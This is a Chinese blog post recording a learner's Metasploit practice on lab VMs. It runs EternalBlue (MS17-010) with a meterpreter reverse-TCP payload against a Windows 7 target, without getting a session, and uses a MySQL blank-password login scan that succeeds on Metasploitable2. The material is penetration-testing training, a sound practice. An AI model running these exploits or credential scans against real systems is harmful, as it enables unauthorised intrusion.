Kali学习3——MSF

最新推荐文章于 2024-08-15 09:37:02 发布
最新推荐文章于 2024-08-15 09:37:02 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: Kali学习 文章标签: kali linux 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haixing1994/article/details/113180218
版权

metasploitable2

metasploitable为基于ubuntu的靶机。

下载后直接打开虚拟机即可。

默认账号密码是msfadmin

# 设置root密码
sudo passwd root

# 设置固定IP
vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx

# 重启网卡
/etc/init.d/networking restart

metasploit framework

msf依赖postgresql数据库,因此需要在kali中先开启

# 启动postgresql
systemctl start postgresql

# 设置开机自启
systemctl enable postgresql

在打开msf console时,也会自动启动postgresql

  • connect命令

    一般用于内网渗透。

    msf6 > connect
Usage: connect [options] <host> <port>

Communicate with a host, similar to interacting via netcat, taking advantage of
any configured session pivoting.

OPTIONS:

    -C        Try to use CRLF for EOL sequence.
    -P <opt>  Specify source port.
    -S <opt>  Specify source address.
    -c <opt>  Specify which Comm to use.
    -h        Help banner.
    -i <opt>  Send the contents of a file.
    -p <opt>  List of proxies to use.
    -s        Connect with SSL.
    -u        Switch to a UDP socket.
    -w <opt>  Specify connect timeout.
    -z        Just try to connect, then return.

msf6 > connect xuegod.cn 80
[*] Connected to xuegod.cn:80 (via: 0.0.0.0:0)
get /
HTTP/1.1 400 Bad Request
Server: nginx/1.6.2
Date: Thu, 21 Jan 2021 08:05:06 GMT
Content-Type: text/html
Content-Length: 172
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>

  • show命令

    show options 查看需要的参数

  • search命令

    search name:mysql

    search path:mysql 查询mysql目录下的漏洞

    search platform:mysql 查询影响mysql平台的漏洞

    search cve:CVE-2017-8464

  • use命令

    use 模块的名字

    msf6 > search cve:8464

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
   1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             

msf6 > use 0
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) >

  • info命令

    msf6 > search cve:8464

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
   1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             

msf6 > info 0

       Name: LNK Code Execution Vulnerability
     Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-06-13

Provided by:
  Uncredited
  Yorick Koster
  Spencer McIntyre

Module stability:
 crash-service-restarts

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows x64
  2   Windows x86

Check supported:
  No

Basic options:
  Name      Current Setting        Required  Description
  ----      ---------------        --------  -----------
  DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
  FILENAME  Flash Player.lnk       no        The LNK file
  PATH                             no        An explicit path to where the files will be hosted

Payload information:
  Space: 2048

Description:
  This module exploits a vulnerability in the handling of Windows 
  Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
  malicious DLL. This vulnerability is a variant of MS15-020 
  (CVE-2015-0096). The created LNK file is similar except an 
  additional SpecialFolderDataBlock is included. The folder ID set in 
  this SpecialFolderDataBlock is set to the Control Panel. This is 
  enough to bypass the CPL whitelist. This bypass can be used to trick 
  Windows into loading an arbitrary DLL file. If no PATH is specified, 
  the module will use drive letters D through Z so the files may be 
  placed in the root path of a drive such as a shared VM folder or USB 
  drive.

References:
  https://cvedetails.com/cve/CVE-2017-8464/
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
  http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
  https://msdn.microsoft.com/en-us/library/dd871305.aspx
  http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
  https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
使用永恒之蓝对WIN7进行渗透
msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.197.53   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

这里渗透失败了,是因为目标机是32位系统,而MSF内置的漏洞是64位的,需要安装32位的漏洞,这里参考的:添加链接描述。然后使用32位的漏洞进行渗透:

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

run了几次,但还是失败了,不知道是什么原因。

使用MSF扫描靶机mysql空密码

首先进行search
 

msf6 > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login

msf6 > use 0

然后查看需要填写的参数

msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOST 192.168.197.55
RHOST => 192.168.197.55

这里设置的目标机地址为metasploitable2虚拟机

msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.197.55:3306   - 192.168.197.55:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.197.55:3306   - No active DB -- Credential data will not be saved!
[+] 192.168.197.55:3306   - 192.168.197.55:3306 - Success: 'root:'
[*] 192.168.197.55:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

执行成功,目标机root账号为空密码

loca.
关注
专栏目录
hackthebox(HTB) Ambassdor !
qq_58869808的博客
12-08 6716
hackthebox(HTB) Ambassdor !
kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter
(∪.∪ )...zzz的博客
10-27 1241
这里写自定义目录标题Exploit模块1. Active exploitpsexec2. Passive Exploits Exploit模块 1. Active exploit 攻击者主动连接受害者 payload发给受害者执行 psexec use exploit/windows/smb/psexec # 基于smb协议 # 需要目标机的权限 # 利用psexec模块 # 在132上执行该模块的payload后将shell反弹给161kali的4444端口 set RHOST 192.168.98
Kali msf教程
08-24
kali linux msf系列教程
MSF验证SMB登录
Ethan024的博客
06-22 2284
MSF中SMB登录扫描器(SMB Login Check)对大量的主机用户名和口令进行猜测。这种扫描动静大,容易被察觉,而且每一次登录尝试都会在被扫描的Windows主机系统日志中留下记录。 使用smb_login模块,show options查看选项: msf6 > use auxiliary/scanner/smb/smb_login msf6 auxiliary(scanner/smb/smb_login) > show options 设置目标主机地址,用户名密码等相关信息: ms
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
baimao__Ch的博客
08-15 987
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。最后。
MSF的使用与靶场安装
Cper的博客
10-22 1881
MSF的一些实操练习
第四期_Metasploit 基础(四)Payloads《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 1205
四、METASPLOIT 基础 4. Payloads 有效负载 Metasploit 中的有效负载是指漏洞利用模块。Metasploit 框架中主要有三种不同类型的有效负载模块:Singles、Stagers 和 Stages。这些不同类型的负载模块拥有多功能性,并且可以在多种类型的场景中使用。无论负载是否有阶段(stage),都由负载名称中的"/"表示。例如,windows/shell_bind_tcp 是 single(没有阶段的单个)有效负载,而windows/shell/bind_tcp 由 st
kali】Mestasploit——基本使用1 142-147
(∪.∪ )...zzz的博客
10-24 2096
目录标题一、渗透测试者的困扰二、Metasploit 简介三、Metasploit 架构RexMsf::CoreMsf::BasePlugin 插件模块技术功能模块(不是流程模块)Payload:技术功能模块(不是流程模块)四、 基本使用1. 使用前先升级:msfupdate2. 点击鼠标启动3. help3.1 ms>help show3.2 msf>help search4. 模块内命令5. 数据库操作db_statusdb_nmap五、Exploit模块1. Active exploit
内网通道构建——MSF socks
SheXinK’s Blog
12-25 4089
内网通道构建——MSF socks篇1、 测试环境2、 内网通道构建2.1、socks4a代理2.2、socks5代理 1、 测试环境   攻击机:192.168.11.131   Target1:192.168.11.151 192.168.21.101   Target2:192.168.21.102   Kali攻击机已拿到Target1的msf shell,需通过Target1构建通道,访...
网络安全kali web安全 Kalimsf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
MSFKali最强渗透工具之Metasploit
zou09241314的博客
10-23 1119
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
从后渗透分析应急响应的那些事儿(二)免杀初识篇
爱上卿的博客
06-06 4597
从后渗透分析应急响应的那些事儿(二)免杀初识篇 文章首发于freebuf Tidesec专栏 https://www.freebuf.com/column/204005.html,转载到个人博客记录,转载请注明出处。 不知攻,焉知防。初识免杀,借此划重点分析应急响应应注意的免杀木马那些事儿。 1免杀相关定义 1.1木马 木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来...
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
metasploit学习记录
m0_55654575的博客
03-05 211
萌新学习记录
Lab - ElasticSearch Search Groovy Sandbox Bypass
Nixawk
03-05 2061
Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with
渗透工具——kalimsf(后门生成模块msfvenom)
2301_78006725的博客
09-02 781
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
kaliMSF框架
qq_41821067的博客
02-18 2258
理论准备 认识Metasploit框架 Metasploit模块简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具 ...
Kali MSF命令模块最详细模块与利用解释整合
Sunspot
04-19 1890
稍后,如果另一个请求到达该 ISAPI 模块,则将使用先前获得的指针,从而导致访问冲突或潜在的任意代码执行。该模块发送格式错误的 TKEY 查询,该查询利用在受影响的 BIND9“命名”DNS 服务器上处理 TKEY 查询时的错误。由于BigIP会在第一个未经身份验证的请求后分配一个新会话,并且仅当访问策略超时时才删除该会话,因此攻击者可以通过重复发送初始HTTP请求并使会话处于挂起状态来耗尽所有可用的会话。POST 请求处理中的边界错误而存在的,其中应用程序输入设置为过长的文件名。
渗透之——kali Metasploit 连接 Postgresql 默认密码
冰河的专栏
01-20 2984
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86563805 1.启动 postgresql service postgresql start postgresql开机自启动 update-rc.d postgresql enable 2.自行测试 postgresql 是否安装成功 根据需要,自行 修改 po...
Kali实战渗透:MSF、美化与渗透技术详解
Kali Linux实战渗透指南深入解析 本文将围绕Kali Linux系统的实战渗透技巧展开,涉及多个关键主题。首先,我们将探讨Kali系统的基础配置与美化,包括安装VMware Tools以提升虚拟机性能,通过`tarzxvf`解压并运行...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值